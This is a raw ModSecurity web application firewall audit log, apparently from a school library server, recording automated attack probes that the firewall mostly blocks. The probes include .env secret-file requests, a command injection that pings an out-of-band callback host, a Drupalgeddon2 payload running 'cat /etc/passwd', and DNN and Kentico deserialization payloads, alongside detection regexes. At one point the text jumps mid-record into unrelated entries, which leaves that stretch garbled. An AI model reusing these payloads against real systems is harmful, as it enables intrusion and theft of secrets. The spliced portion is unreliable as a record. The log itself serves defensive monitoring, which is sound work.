X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e516427c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e516427c-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748268076389541 1208 (- - -) Stopwatch2: 1748268076389541 1208; combined=342, p1=308, p2=0, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e516427c-Z-- --1de68644-A-- [26/May/2025:21:58:23 +0700] aDSBj8-W3hHsdQpQwdQJmAAAAM0 103.236.140.4 47460 103.236.140.4 8181 --1de68644-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 Accept-Charset: utf-8 --1de68644-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1de68644-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748271503085710 799 (- - -) Stopwatch2: 1748271503085710 799; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1de68644-Z-- --798fe82a-A-- [26/May/2025:21:59:28 +0700] aDSB0P7lSIOiZEhmvSxOhwAAAE4 103.236.140.4 49028 103.236.140.4 8181 --798fe82a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; JSN-AL00a Build/HONORJSN-AL00a; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/1961 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --798fe82a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --798fe82a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748271568845705 1123 (- - -) Stopwatch2: 1748271568845705 1123; combined=345, p1=300, p2=0, p3=0, p4=0, p5=45, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --798fe82a-Z-- --0241f838-A-- [26/May/2025:22:32:52 +0700] aDSJpM-W3hHsdQpQwdQjggAAAMg 103.236.140.4 43734 103.236.140.4 8181 --0241f838-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.240 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --0241f838-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0241f838-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748273572745446 749 (- - -) Stopwatch2: 1748273572745446 749; combined=361, p1=327, p2=0, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0241f838-Z-- --012c0045-A-- [26/May/2025:23:18:29 +0700] aDSUVXFOzWd_Ai7zJXXB_AAAAA4 103.236.140.4 46286 103.236.140.4 8181 --012c0045-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Charset: utf-8 --012c0045-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --012c0045-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276309568595 757 (- - -) Stopwatch2: 1748276309568595 757; combined=314, p1=275, p2=0, p3=0, p4=0, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --012c0045-Z-- --a726b23e-A-- [26/May/2025:23:18:45 +0700] aDSUZXFOzWd_Ai7zJXXCHAAAABE 103.236.140.4 46748 103.236.140.4 8181 --a726b23e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) baidu.sogo.uc.Chrome/36.0.1985.125 Safari/537.36 Accept-Charset: utf-8 --a726b23e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a726b23e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276325681313 690 (- - -) Stopwatch2: 1748276325681313 690; combined=239, p1=211, p2=0, p3=0, p4=0, p5=28, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a726b23e-Z-- --2a8e122f-A-- [26/May/2025:23:19:18 +0700] aDSUhnFOzWd_Ai7zJXXCkAAAABI 103.236.140.4 47638 103.236.140.4 8181 --2a8e122f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Accept-Charset: utf-8 --2a8e122f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a8e122f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276358650060 795 (- - -) Stopwatch2: 1748276358650060 795; combined=344, p1=300, p2=0, p3=0, p4=0, p5=44, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a8e122f-Z-- --472f7708-A-- [26/May/2025:23:19:31 +0700] aDSUk8-W3hHsdQpQwdRSwAAAAMc 103.236.140.4 47982 103.236.140.4 8181 --472f7708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 Accept-Charset: utf-8 --472f7708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --472f7708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748276371065488 619 (- - -) Stopwatch2: 1748276371065488 619; combined=248, p1=210, p2=0, p3=0, p4=0, p5=38, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --472f7708-Z-- --bd6da004-A-- [26/May/2025:23:45:59 +0700] aDSax3FOzWd_Ai7zJXXS_QAAAAM 103.236.140.4 36106 103.236.140.4 8181 --bd6da004-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 EdgA/119.0.0.0 --bd6da004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd6da004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748277959160086 728 (- - -) Stopwatch2: 1748277959160086 728; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd6da004-Z-- --0213f24b-A-- [26/May/2025:23:45:59 +0700] aDSax1SmKJQK-9oQ9SSUswAAAII 103.236.140.4 36124 103.236.140.4 8181 --0213f24b-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.55.127 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.55.127 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36 EdgA/119.0.0.0 --0213f24b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0213f24b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748277959653457 563 (- - -) Stopwatch2: 1748277959653457 563; combined=227, p1=199, p2=0, p3=0, p4=0, p5=28, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0213f24b-Z-- --3a43b97a-A-- [26/May/2025:23:51:49 +0700] aDScJVSmKJQK-9oQ9SSbsgAAAI0 103.236.140.4 46792 103.236.140.4 8181 --3a43b97a-B-- GET /__ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini X-Varnish: 166619968 --3a43b97a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a43b97a-E-- --3a43b97a-H-- Message: Access denied with code 403 (phase 2). Pattern match "WriteFileC:\Windows\win.ini X-Varnish: 168940504 --c615c909-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c615c909-E-- --c615c909-H-- Message: Access denied with code 403 (phase 2). Pattern match " --85681836-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --85681836-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748283281103150 6683 (- - -) Stopwatch2: 1748283281103150 6683; combined=5004, p1=542, p2=4313, p3=48, p4=73, p5=28, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85681836-Z-- --6e0bb15c-A-- [27/May/2025:01:14:41 +0700] aDSvkVSmKJQK-9oQ9STiqwAAAIY 103.236.140.4 55850 103.236.140.4 8181 --6e0bb15c-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168676360 --6e0bb15c-C-- whatever-content --6e0bb15c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e0bb15c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748283281104495 5877 (- - -) Stopwatch2: 1748283281104495 5877; combined=4492, p1=435, p2=3959, p3=29, p4=42, p5=26, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e0bb15c-Z-- --5010fb57-A-- [27/May/2025:01:14:41 +0700] aDSvkc-W3hHsdQpQwdTGcwAAANI 103.236.140.4 55866 103.236.140.4 8181 --5010fb57-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0q9cd1gpeook7mlf7sg3qt5ohdwyin97.oast.live%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168868858 --5010fb57-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5010fb57-E-- --5010fb57-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0q9cd1gpeook7mlf7sg3qt5ohdwyin97.oast.live`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748283281118977 1789 (- - -) Stopwatch2: 1748283281118977 1789; combined=630, p1=474, p2=130, p3=0, p4=0, p5=26, sr=47, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5010fb57-Z-- --845c741a-A-- [27/May/2025:01:14:41 +0700] aDSvkc-W3hHsdQpQwdTGdQAAAMs 103.236.140.4 55866 103.236.140.4 8181 --845c741a-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168868861 --845c741a-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 
Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --845c741a-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --845c741a-E-- --845c741a-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748283281121781 2971 (- - -) Stopwatch2: 1748283281121781 2971; combined=2219, p1=247, p2=1918, p3=17, p4=18, p5=19, sr=47, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --845c741a-Z-- --d56d3641-A-- [27/May/2025:01:14:41 +0700] aDSvkVSmKJQK-9oQ9STirQAAAII 103.236.140.4 55888 103.236.140.4 8181 --d56d3641-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168940714 --d56d3641-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%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%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%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%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --d56d3641-F-- HTTP/1.1 403 
Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d56d3641-E-- --d56d3641-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748283281124744 9774 (- - -) Stopwatch2: 1748283281124744 9774; combined=8563, p1=279, p2=8264, p3=0, p4=0, p5=20, sr=51, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d56d3641-Z-- --f3cf444b-A-- [27/May/2025:01:14:52 +0700] aDSvnM-W3hHsdQpQwdTG1gAAANg 103.236.140.4 56242 103.236.140.4 8181 --f3cf444b-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159435959 --f3cf444b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f3cf444b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
